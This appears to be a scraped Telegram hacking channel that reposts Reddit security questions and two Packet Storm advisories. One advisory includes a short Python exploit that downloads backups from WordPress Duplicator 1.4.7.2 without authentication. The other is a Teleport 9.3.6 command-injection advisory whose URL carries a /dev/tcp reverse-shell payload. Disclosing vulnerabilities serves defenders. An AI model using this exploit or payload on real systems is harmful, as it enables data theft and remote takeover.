Hacking Articles Tips Tricks Videos Tutorials
467 subscribers
65.7K photos
15 videos
157 files
131K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
hacking: security in practice
should I apply or not?

I saw a job post on LinkedIn by spaceX for a network engineering job... I have all the qualifications they have listed in the post. The problem is... I'm 14. So I don't know if I should apply or not (I don't think I'll be hired because of my age). The job is full-time and on-site. And it's 11,900km away from where I live. I don't think they will hire me + I don't think I should apply at this age. What do u guys think?

(Pls no hate 🙂)

submitted by /u/Aryangsuktekar
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
DoT vs DoH vs DoQ vs DNSCrypt vs DNSCurve

Which of the above protocols (or any other not mentioned) provide:

A) the most reliable and secure DNS encryption standard. Ideally which have been proven.

B) optimal anonymity

submitted by /u/Intelligent-Way1288
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Repurposing IPad 2

Does anyone have any ideas on what I could do with an old IPad 2? It can’t be updated past iOS 9.3.5, so using it is rather pointless as many apps won’t run. Is there anything I can do with it? Hell I would love to have it for an OSRS tablet but I cant run anything on it. Was looking to toss Linux on it but I can’t seem to find much information on the process. I know QMole has some documentation but am curious of other peoples thoughts. Any cool ideas or simple ones just to get some use from it? Kind of wanting something to tinker with anyway. Thanks for suggestions

submitted by /u/Juiicybox
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Safe to access HTTPS sites using free public WiFi hotspot

Is it safe enough to log in and check Web mails (e.g. Gmail) if HTTPS is used?

Can a free public WiFi router/access point (assuming it is compromised/malicious) steal my email login/password?

submitted by /u/2048b
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Best RFID readers/writer

Does anyone have experience with good rfid/nfc cards readers/writers. Especially: -Ease to install/use -Price -Availability (preferably on Amazon) Thanks!

submitted by /u/MarwenJ
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Duplicator 1.4.7.2 Backup Disclosure

https://2.bp.blogspot.com/-n3YJZo98ptc/WWlvfHNo4ZI/AAAAAAAAIP8/W2JyxBpYTHMTjkJx5zl91eYOlgUDpw8egCLcBGAs/s1600/h84.png
WordPress Duplicator plugin version 1.4.7.2 suffers from a backup disclosure vulnerability.

SHA-256 | 4b429acd0d9ab9938f8fc1e0f2d883938eed396e2695e2c2d455e519b5de3ad0

Download
## Title: WordPress Plugin Duplicator 1.4.7.2 - Unauthenticated Backup Download
## Author: nu11secur1ty
## Date: 08.23.2022
## Vendor: https://wordpress.org/
## Software: https://wordpress.org/plugins/duplicator/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2

## Description:
The WordPress Plugin Duplicator 1.4.7.2 suffers from Unauthenticated
Backup Download, after an update from the 1.4.7.1 version.
The attacker can download all archive information from the system by
using this vulnerability!
Status: CRITICAL

[+] Exploit:

```python
#!/usr/bin/python
# Author nu11secur1ty
from selenium import webdriver
import time
import os

print("Test if you can access the directory\n")
time.sleep(5)
os.system('curl http://pwned-host.com/wordpress/wp-content/backups-dup-lite/')
target=input("Give the name of the archive...\n")
driver = webdriver.Chrome()
driver.get('http://pwned-host.com/wordpress/wp-content/backups-dup-lite/'
+ target)

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2)

## Proof and Exploit:
[href](https://streamable.com/x0cvjh)

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Teleport 9.3.6 Command Injection

https://1.bp.blogspot.com/-nibhxYxL_dU/WWlvdqzVqgI/AAAAAAAAIPo/_mHlQijSxHEwrD5GdeVybD20bu3Iyyg_QCLcBGAs/s1600/h8.png
Teleport 9.3.6 is vulnerable to command injection leading to remote code execution. An attacker can craft a malicious ssh agent installation link by URL encoding a bash escape with carriage return line feed. This url encoded payload can be used in place of a token and sent to a user in a social engineering attack. This is fully unauthenticated attack utilizing the trusted teleport server to deliver the payload.

SHA-256 | 5228298638858e0e106cda75b65bd4c283027b5bc6dff934d99ebc3b59a112f7

Download
Description:Teleport 9.3.6 is vulnerable to Command injection leading to Remote
Code Execution. An attacker can craft a malicious ssh agent
installation link by URL encoding a bash escape with carriage return
line feed. This url encoded payload can be used in place of a token and
sent to a user in a social engineering attack. This is fully
unauthenticated attack utilizing the trusted teleport server to deliver
the payload.

Additional Information:https://goteleport.com/
https://github.com/gravitational/teleport
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36633

Vulnerability Type: otherCommand injection leading to Remote Code Execution

Vendor of Product:Teleport - https://goteleport.com/
Affected software version: Teleport version < v10.1.2

Affected Component:https://teleport.examplesite.com/scripts/*INJECTION-POINT*/install-node.sh?method=iam /dev/tcp/10.0.0.1/5555 0<&1&1 #

Patch information:https://goteleport.com/docs/changelog/#1012
https://github.com/gravitational/teleport/pull/14944
------------------------------------------

Discoverers:
Brandon Roach & Brian Landrum

------------------------------------------

Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Broken Access Control

Broken Access Control vulnerabilities are common in modern applications since the design and implementation of access control mechanisms…Continue reading on Medium »
Read more...